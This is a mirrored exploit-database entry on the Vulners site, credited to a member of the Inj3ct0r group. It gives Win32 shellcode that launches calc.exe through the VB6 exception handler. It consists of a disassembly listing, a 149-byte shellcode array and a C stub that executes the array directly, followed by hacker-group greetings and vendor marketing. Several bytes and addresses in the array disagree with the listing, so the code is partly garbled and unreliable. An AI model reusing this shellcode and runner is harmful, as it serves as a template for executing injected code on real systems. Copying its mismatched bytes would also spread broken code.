Vulners
Lucene search
win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : [email protected] | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) SEH;
(int)(*shellcode)();
}
/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
*/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 May 2011 00:00Current
0.2Low risk
Vulners AI Score0.2